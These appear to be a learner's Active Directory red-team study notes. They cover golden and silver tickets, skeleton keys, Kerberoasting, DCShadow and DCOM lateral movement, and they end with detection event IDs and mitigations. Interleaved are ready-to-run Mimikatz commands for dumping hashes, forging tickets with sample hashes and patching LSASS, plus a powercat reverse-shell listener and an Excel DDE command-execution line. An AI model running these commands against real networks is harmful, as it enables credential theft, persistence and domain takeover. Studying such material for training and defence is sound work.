Powershell remoting requires administrative privilege to run on the remote machine.
#Invoke-Command -ComputerName 10.0.2.50 -ScriptBlock { whoami /priv } -credential administrator
2.Mimikatz
Over Pass the Hash attack actually generates tokens from hashes which are further used for token-based attacks. Stealing a TGS with mimikatz would allow us to access only particular
resources associated with those tickets. On the other side, armed with a TGT ticket, we could request a TGS for specific resources we want to target within the domain
Domain persistence
Kerberos-
Mimikatz
Golden ticket- In this GT attack the hash of the KRGBT account is the key part the attacker needed to create GT. The golden ticket is TGT.
Silver ticket- IN this case it’s the NTLM hash of the service account’s password which is the key part the attacker needs to create ST.Silver tickets are TGS.In most cases, the local machine accounts
are service accounts. so with the help of mimikatz we can dump the passwords of the local system accounts. From there we will get the service accounts NTLM hashes as well
-so when dumping the hashes with Mimikatz for silver tickets, we are actually dumping the NTLM hashes of the local system account.
#Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘ -Computername DC03
This command will give the NTLM hashes and from that look for a RID equal to 1000. this is the domain controller’s machine account. Below is the sample output.
RID : 000003e8 (1000)
User : DC03$
LM :
NTLM : fbd8aaee4e8beac14739cc364b696f83
Running PowerShell as administrator
Step 1: Open the Command Prompt, type the PowerShell as a command, then press Enter key.
step 2:Type the command “start-process PowerShell -verb runas” and press the “enter” key.
Silver ticket:-Invoke-Mimikatz -Command ‘”kerberos::golden /User:Administrator /domain:testing.dev.corp.local /sid:S-1-5-21-2244954328-2189829416-1702281483-1219 /target:testing.dev.corp.local /service:CIFS /rc4:fbd8aaee4e8beac14739cc364b696f83 /user:Administrator /ptt”‘
Golden ticket:- Invoke-Mimikatz -Command ‘”kerberos::golden /User:Administrator /domain:testing.dev.corp.local /sid:S-1-5-21-2244954328-2189829416-1702281483-1219 /krbtgt:3cc0143160344c58d74932cab4199808 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”‘
Once you have a silver ticket you can add a new service in the form of a schedule task to get a reverse shell as shown on page 123 of the PPT.
Here we can use a tool called powercat to get the reverse shell.
#powercat -lvp 443 -t 1000
Persistence- Skeleton Key
-The skeleton key is a persistence technique where it is possible to patch a Domain Controller (lsassprocess) so that it allows access to any user with a single password.
-You can only run skeleton-key exploit only one time.
-This skeleton exploit runs only on systems with domain admin privileges.
#Invoke-Mimikatz -Command ‘”privilege::debug” “misc::skeleton”‘ -ComputerName DC05
The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware injects itself into LSASS and creates a master password that will work for any account in the domain. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for.
Domain Persistence-part 3
DSRM passwords- These passwords are the passwords that are given to a system when it is promoted to a domain controller. Usually, these passwords are changed very rarely.
Custom SSP-Security Support Provider is a DLL that helps applications in an OS get authentication details. Some of the SSPs are NTLM, Kerberos, etc.
Persistence using ACLs –AdminSDHolder
Build-In protected groups also called Privileged groups have ACL’s which are found in the AdminSDHolder container. This container can be abused for more persistence
Persistence using ACLs –Rights Abuse
Priv Esc -Kerberoast
Service accounts are usually machine accounts. Machine account passwords are usually set by machines, and these passwords are long, thus making them difficult to crack. So in Kerberosting service accounts are not targeted but normal user accounts are targeted.
We can also set normal user accounts as service accounts, which is sometimes called as SPN.So in active directory users and computers, if a user is having ‘SericeprincipalName’ set to something, then it’s a service account.
#klist
above command Displays a list of currently cached Kerberos tickets. Kerberos tickets are stored with extension .kirbi
Privelege-escalation DNSadmin
It is possible for the members of the DNS admin group to load arbitrary dll’s with the privileges of the dns.exe.15:47 12/07/2022
Priv-esc -Across trust
When a user in a domain wants to access the service of another domain, a thing called a trust key is shared between them. This trust key along with TGS is what helps to create a session between different domains. From the trust key, we generate trust tickets which are then abused for PE. Here we use a SID history attack to get the EA privileges.
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain
https://book.hacktricks.xyz/windows/active-directory-methodology
Forest persistence- DC shadow
It is a post-exploitation attack (also called a domination attack) because it requires domain admin (or enterprise admin) privileges. Why DCshadow is a dynamic attack, because if you have added the user to the PrimaryGroupID object then it will be not easy for an administrator to remove any user from inside the domain admin group. This will work on systems only in which the DC replication is enabled.
DCSync allows an attacker to impersonate a domain controller and request password hashes from other domain controllers. Simply put: DCShadow inverts the attack path of DCSync, pushing Active Directory objects that benefit the attacker out into an Active Directory environment rather than pulling sensitive Active Directory objects from other domain controllers.
https://www.qomplx.com/qomplx-knowledge-active-directory-dcshadow-attacks-explained/
-DC replication services use RPC protocol.
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
It doesn’t allow red teamers to gain privileges but give them another solution to become persistent or to make illegitimate actions in a directory infrastructure. In fact, to be part of the replication process we need to take care of two requirements:
-be trusted by other servers, meaning that we need to have valid authentication credentials.
-provide authentication support to let other DCs connect to our rogue server when we need to replicate data.
###########################################################################
In Offsec’s lab after the initial access, the privilege escalation is performed using the PTH, PTT, and Over-PTH.
Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). But for the lateral movement mainly here the following techniques are used
-DCOM
-WMI
-PSRemoting(use PSremoting script from CRTP to check for lateral movement)
Persistence mechanisms are done using two methods
-Golden tickets
-DC-Sync
COM is a component of Windows that facilitates interoperability between software, DCOM extends this across the network using remote procedure calls (RPC). Software hosting a COM server (typically within a DLL or exe) on a remote system is therefore able to expose its methods to clients using RPC.DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer just like objects on the local machine using the DCERPC-based DCOM protocol
There are several com objects in windows but not all COM objects facilitate lateral movement. Below is the PowerShell command to check out the COM objects . Distributed Component Object Model (DCOM) is a programming construct that allows a computer to run programs over the network on a different computer as if the program was running locally. This is a proprietary Microsoft software component that allows COM objects to communicate with each other over the network. Administrative privilege is needed in the target machine for the DCOM lateral movement to work. The user will need Admin privileges on the Host machine to access the MMC 2.0 method and also Admin privileges on the Remote machine to execute.
https://www.cybereason.com/blog/dcom-lateral-movement-techniques
#Get-CimInstance -class Win32_DCOMApplication |select appid,name
Once the DCOM objects are listed, we can instantiate each AppID and list the available methods using the Get-Member cmdlet:
#$obj = [activator]::CreateInstance([type]::GetTypeFromCLSID(“<CLSID>”))
#$obj | get-member
When it comes to Excel application we go through the above process to identify the methods that are available within the excel which facilitate the lateral movement
#$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(“Excel.Application”))
#$excel | get-member
Reviewing these methods, you can find at least two methods that are known to be capable of lateral movement- ExecuteExcel4Macro and RegisterXLL
To perform this technique, first create an instance of the “Excel.Application” object, which is the COM object associated with Excel automation. “xxx.xxx.xxx.xxx”, in all future examples, stands for a target address:
#$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(“Excel.Application”, “192.168.1.1”))
This is followed by the suppression of alerts and execution:
#$excel.DisplayAlerts = $false
#$excel.DDEInitiate(“cmd”, “/c calc.exe”)
——————————————————————————————————————————
Defense mechanisms
Golden Tickets
ID-Event ID
4624: Account Logon
4672: Admin Logon
Silver tickets
4624: Account Logon
4634: Account Logoff
4672: Admin Logon
Skeleton Key
Events
System Event ID 7045 A service was installed in the system. (Type Kernel Mode driver)
Events (“Audit privilege use” must be enabled)
Security Event ID 4673 Sensitive Privilege Use
Event ID 4611 A trusted logon process has been registered with the Local Security Authority
DSRM persistence
Event ID 4657 Audit creation/change of HKLM: System CurrentControlSet
Kerberos ticket- unconstraint
Events-Security Event ID 4769 A Kerberos ticket was requested
Mitigation
Service Account Passwords should be hard to guess (greater than 25 characters)
Use Managed Service Accounts (Automatic change of password periodically and delegated SPN Management)
Since 4769 is logged very frequently on a DC. We may like to filter results based on the following information from logs:
The service name should not be krbtgt
The service name does not end with $ (to filter out machine accounts used for services)
The account name should not be machine@domain (to filter out requests from machines)
The failure code is ‘0x0’ (to filter out failures, 0x0 is a success) Most importantly, the ticket encryption type is 0x17
Kerberos-constraint-Mitigation
Limit DA/Admin logins to specific servers .Set “Account is sensitive and cannot be delegated” for privileged accounts.
ACL attacks Events
Security Event ID 4662 (Audit Policy for an object must be enabled) An operation was performed on an object
Security Event ID 5136 (Audit Policy for an object must be enabled) A directory service object was modified
Security Event ID 4670 (Audit Policy for an object must be enabled) Permissions on an object was changed
Trust tickets
SID Filtering
Avoid attacks that abuse SID history attribute across forest trust.Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed
secured by default (MS considers the forest and not the domain to be a security boundary). But, since SID filtering has the potential to break applications and user access, it is
often disabled.
Advanced methods
-ATA(Advanced threat analytics)
-LAPS(Local administrator password solutions)
-credential guard
-protected users group
-Privileged Administrative Workstations(PAWS)
-Deception technology
-PS v5 supports Enhanced logging script block logging and system-wide transcription.
Restricting PowerShell
Use Application Control Policies (Applocker) and Device Guard to restrict PowerShell scripts. If Applocker is configured in “Allow mode” for scripts, PowerShell 5 automatically uses the Constrained Language Mode. In the constrained language mode, all Windows cmdlets and elements are allowed but allow only limited types. For example, Add-Type,Win32APIs, COM objects are not allowed.